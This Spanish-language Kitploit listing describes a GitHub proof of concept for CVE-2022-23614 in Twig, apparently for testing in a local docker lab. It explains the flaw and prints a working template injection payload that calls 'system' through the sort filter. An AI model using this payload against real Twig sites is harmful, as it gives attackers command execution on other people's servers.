Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-23614 — PoC para CVE-2022-23614 (filtro sort de Twig – ejecución de código / bypass de sandbox) | Kitploit
Herramientas/GitHubGitHub/davwwwx/cve-2022-23614
Análisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubdavwwwx/cve-2022-23614

CVE-2022-23614

PoC para CVE-2022-23614 (filtro sort de Twig – ejecución de código / bypass de sandbox)

Ver Repositorio
42hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-23614

PoC para CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Ejecución de código/filtro sort de Twig y evasión de sandbox)

Como se ve en este commit - https://github.com/twigphp/Twig/commit/.., twig estaba pasando el nombre de una función proporcionada por el usuario como parámetro callback a uasort (aquí), lo que conducía a la ejecución arbitraria de código

Para construir y ejecutar el contenedor docker con una versión vulnerable de twig

root@kitploit:~
$ ./build-docker.sh

Abre la página web en localhost:1337 e intenta renderizar el siguiente payload

root@kitploit:~
{{ ['id','']|sort('system') }}

PoC PoC

Resultado Resultado

Descargar herramienta